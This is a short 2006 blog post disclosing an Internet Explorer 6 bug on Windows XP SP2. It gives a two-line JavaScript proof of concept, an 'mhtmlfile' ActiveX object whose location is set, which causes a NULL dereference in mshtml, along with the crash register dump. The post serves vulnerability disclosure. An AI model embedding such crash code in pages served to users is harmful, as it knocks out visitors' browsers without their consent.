The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the location or URL property triggers a NULL dereference. Thanks to 'sniper' for the submission.
var a = new ActiveXObject('mhtmlfile');
a.location = "http://browserfun.blogspot.com";
Demonstration
eax=00000000 ebx=00000001 ecx=0000ae80
edx=0020540c esi=019c2420 edi=00000000
eip=7dcd113e esp=00139048 ebp=0013b074
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??
This bug will be added to the OSVDB:
Microsoft IE MHTMLFile Multiple Property NULL Dereference
Sunday, July 16, 2006
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment